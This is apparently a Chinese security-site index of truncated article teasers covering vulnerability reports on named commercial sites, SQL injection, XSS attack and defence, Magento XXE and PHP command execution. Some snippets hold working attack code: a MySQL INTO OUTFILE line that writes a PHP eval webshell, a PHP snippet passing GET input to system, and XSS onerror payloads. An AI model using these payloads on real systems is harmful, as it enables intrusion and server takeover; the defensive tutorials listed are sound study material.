苏宁网站购物支付金额可修改漏洞及修复 - 网站关注热度:17

1.存在漏洞的是主站哦http://www.suning.com/emall/city_10052_10051_9264_.html2.支付漏洞，模拟下如何使用1元钱买ipad的吧，下面这张图选择一键购3.填写好想要信息之后，进入到付款页面，注意看金..[详情]

大众点评团购商家合作页面存在SQL注入漏洞 - 网关注热度:9

大众点评团购合作提交页面使用的是一个开源的调查程序LimeSurvey，其实对这个程序稍微关注的筒子都会知道这个程序有几个注入的洞洞，刚好最近闲来无事时试了下，还真发现有sql注入..[详情]

php168 v6~v7部分脚本过滤不严致可获取WEBSHELL - 网站关注热度:10

php168 v6~v7鸡肋Getshell安全问题有点鸡肋，需要条件：1.网站配置为：文章生成真静态2.允许注册会员给出v6的测试代码，提交后执行phpinfo()，v7原理一样，只是数据库字段数不一样。member..[详情]

好孩子sql注射漏洞，root权限致多台服务敏感信息关注热度:13

某注射漏洞，没想到又是root权限。结果测试，发现各种服务器基本都是清一色的统一口令。还是考虑到各种奶爸们要在你们网站注册，能做一点算一点了。详细说明：http://www.goodbaby.c..[详情]

XSS攻击的原理 - 网站安全 - 自学php关注热度:13

概念说明Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码，当用户浏览该页或者进行某些操作时，攻击者利用用户对原网站的信任，诱骗用户或浏览器..[详情]

浅谈PHP的SQL注入与应对方法 - 网站安全 - 自学p关注热度:11

SQL注入攻击是黑客攻击网站最常用的手段。如果你的站点没有使用严格的用户输入检验，那么常容易遭到SQL注入攻击。SQL注入攻击通常通过给站点数据库提交不良的数据或查询语句来实..[详情]

PHP防止暴力破解密码 - 网站安全 - 自学php关注热度:14

暴力攻击是一种不使用任何特殊手段而去穷尽各种可能性的攻击方式。它的更正式的叫法是穷举攻击穷举各种可能性的攻击。对于访问控制，典型的暴力攻击表现为攻击者通过大量的尝..[详情]

服务端输出HTML属性的几种危险情况 - 网站安全关注热度:12

没有过滤或转码直接输出code:img src=:{src} hack:img src=xxx:xonerror=alert(1)// 过滤了单引号和双引号code:img src=:{src} hack:img src=xxx:x onerror=alert(1)对内容进行了HTML实体编.....[详情]

XSS攻击过滤函数 - 网站安全 - 自学php关注热度:10

黑客用XSS攻击有多种方式,PHP的内置函数不能应对各种各样的XSS攻击。因此,使用filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags等功能也不能做到100%的防护。你需要一个更好的..[详情]

用php防止XSS跨站脚本攻击的方法 - 网站安全 - 自关注热度:12

现在很多网站都存在跨站脚本攻击漏洞,让黑客有机可乘.跨站攻击很容易就可以构造，而且非常隐蔽，不易被查觉（通常盗取信息后马上跳转回原页面）。 如何攻击，在此不作介绍，主..[详情]

Magento eCommerce Platform XXE Injection利用 - 网站安全关注热度:16

0x2今天看packetstormsecurity时看到了这个漏洞的细节：http://packetstormsecurity.org/files/114710/Magento-eCommerce-Platform-XXE-Injection.html利用方法其中也说的很明白：Proofofconcept:--------------.....[详情]

关于MySQL注入的几个语句 - 网站安全 - 自学php关注热度:11

0x1mysql报错模式下的不使用information_schema来爆表基础知识：USING用于表连接时给定连接条件，Select*fromtable1jointable2ontable1.id=table2.id；使用using可以写为Select*fromtable1jointable2using(id)（.....[详情]

php命令执行小集 - 网站安全 - 自学php关注热度:19

c4bbage@qq.com 2012.09.170x1 ob_start1?php2//http://php.net/manual/en/function.ob-start.php3$cmd=system;4ob_start($cmd);5echo $_GET[cunlide];6ob_end_flush();0x2 system1//http://php.net/ma.....[详情]

PHP FastCGI的远程利用 - 网站安全 - 自学php关注热度:15

说到FastCGI，大家都知道这是目前最常见的webserver动态脚本执行模型之一。目前基本所有web脚本都基本支持这种模式，甚至有的类型脚本这是唯一的模式（ROR，Python等）。FastCGI的主要目的..[详情]

phpmyadmin导出shell mysql导出一句话 - 网站安全 - 自关注热度:70

如果得知数据库账号密码，可通过mysql导出一句话到网站目录.导出shell代码是：select ?php @eval($_POST[#39;pass#39;]);? into outfile #39;C:/APMServ5.2.6/www/htdocs/123.php#39;;代码讲解：se.....[详情]